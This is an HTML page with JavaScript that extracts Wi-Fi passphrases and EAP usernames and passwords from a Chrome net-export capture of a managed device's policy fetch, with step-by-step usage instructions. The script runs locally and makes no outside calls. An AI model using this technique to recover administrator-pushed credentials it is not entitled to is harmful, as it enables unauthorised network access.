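<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Network Policy Password Extractor tool</title>
  <link href="./prism.css" rel="stylesheet">
  <style>
    td, th {
      border: 1px solid #000;
    }

    #log {
      font-family: "Courier";
      margin-bottom: 4em;
    }

    * {
      background-color: black;
      color: rgb(196, 196, 196);
      font-family: monospace;
    }

    input, button {
      background-color: #131313;
      border: 3px solid #0a0a0a;
      border-radius: 3px;
      margin: 1.4px;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <h1>Policy Password tool</h1>

  <p>
    <i>This tool should not be used for illegal activity. By using this tool, you acknowledge that you are legally allowed to extract the password(s) in question.</i>
  </p>

  <p>
    <label for="export"><b>Upload chrome-net-export-log.json - </b></label>
    <input type="file" id="export">
  </p>

  <!-- One row per Wi-Fi entry found in the uploaded log; rows are appended by extract(). -->
  <table id="output-networks">
    <thead>
      <tr>
        <th scope="col">SSID</th>
        <th scope="col">Credentials</th>
        <th scope="col">Security</th>
        <th scope="col">HiddenSSID</th>
      </tr>
    </thead>
    <tbody></tbody>
  </table>

  <h2>How to use</h2>
  <ol>
    <li>Visit chrome://net-export</li>
    <li>In "OPTIONS" set "Include raw bytes"</li>
    <li>Click "Start Logging to Disk"</li>
    <li>Visit chrome://policy</li>
    <li>Click "Reload policies"</li>
    <li>Go back to chrome://net-export and click "Stop logging"</li>
    <li>Upload file here :)</li>
  </ol>

  <div id="log"></div>

  <script>
    // The uploaded file is read with FileReader and processed in this page only;
    // nothing in this script sends it anywhere.
    //
    // Handling note: a net-export capture taken with "Include raw bytes" holds the
    // policy response in decodable form, and log() below prints the decoded policy
    // (credentials included) to both the console and the #log element. Treat the
    // capture file, the console and this page as sensitive once a file is loaded.

    // Base64 fragments of the string "NetworkConfiguration"; a log line containing
    // any of them is taken to be a line where the policy was returned.
    const POLICY_MARKERS = [
      "ya0NvbmZpZ3VyYXRpb2",
      "vcmtDb25maWd1cmF0aW",
      "rQ29uZmlndXJhdGlvbn",
      "Db25maWd1cmF0aW9ucw"
    ];

    // Write a message to the console and append it to the on-page log.
    // innerText is used so that text taken from the file is never parsed as markup.
    const log = (txt) => {
      console.log(txt);
      document.getElementById("log").innerText += txt + "\n";
    };

    // Build a <td> whose text is `value` (assigned as text, not HTML).
    const makeCell = (value) => {
      const td = document.createElement("td");
      td.innerText = value;
      return td;
    };

    // Append one table row for a single entry of the "NetworkConfigurations" array.
    // Entries without a "WiFi" section are skipped instead of aborting the whole
    // policy with a TypeError.
    const appendNetworkRow = (network) => {
      const wifi = network && network["WiFi"];
      if (!wifi) {
        log("Skipping entry without a WiFi section");
        return;
      }

      const eap = wifi["EAP"];
      let credentials = "NOT FOUND";
      if (wifi["Passphrase"]) {
        credentials = wifi["Passphrase"];
      } else if (wifi["Security"] === "WPA-EAP" && eap && eap["Password"]) {
        credentials = "Identity: " + eap["Identity"] + "\nPassword: " + eap["Password"];
      }

      const row = document.createElement("tr");
      row.appendChild(makeCell(wifi["SSID"]));
      row.appendChild(makeCell(credentials));
      row.appendChild(makeCell(wifi["Security"]));
      row.appendChild(makeCell(wifi["HiddenSSID"]));
      document.querySelector("#output-networks tbody").appendChild(row);
    };

    // Decode one matching log line and add its Wi-Fi entries to the table.
    const processPolicyLine = (policyLine) => {
      try {
        // The raw bytes sit between '"bytes":"' and '"},"phase"' as base64.
        const policy = atob(policyLine.substring(
          policyLine.indexOf('"bytes":"') + 9,
          policyLine.indexOf('"},"phase"')
        ));
        log(policy);

        // Cut the "NetworkConfigurations" array out of the decoded response and
        // rebuild it as a standalone array literal.
        let configText = policy.substring(
          policy.indexOf('"NetworkConfigurations":'),
          policy.indexOf("]\n}b")
        ) + "]";
        configText = configText.substring(0, configText.search(/}\n *]/));
        configText = configText.replace(/("NetworkConfigurations":|\n)/g, "") + "}]";
        log(configText);

        // SECURITY: this text comes straight out of the uploaded capture, so it is
        // parsed as data with JSON.parse. The previous eval() ran it as script in
        // this page, which let a crafted or tampered log file execute code here.
        // Text that is not strict JSON now ends up in the catch below and is logged.
        const networks = JSON.parse(configText);

        for (const network of networks) {
          log(network);
          appendNetworkRow(network);
        }
      } catch (err) {
        log(err);
      }
    };

    // "change" handler for the file input: read the selected log as text, collect
    // the lines that carry the policy, and process each one.
    const extract = (event) => {
      const file = event.target.files[0];
      if (!file) {
        // The file dialog was cancelled; readAsText(undefined) would throw.
        return;
      }

      const reader = new FileReader();
      // Handlers are attached before the read is started.
      reader.onload = (e) => {
        const lines = e.target.result.split("\n");
        const policyLines = [];
        lines.forEach((line, index) => {
          if (POLICY_MARKERS.some((marker) => line.includes(marker))) {
            log(index);
            policyLines.push(line);
          }
        });
        policyLines.forEach(processPolicyLine);
      };
      reader.onerror = () => log(reader.error);
      reader.readAsText(file);
    };

    document.getElementById("export").addEventListener("change", extract);
  </script>
</body>
</html>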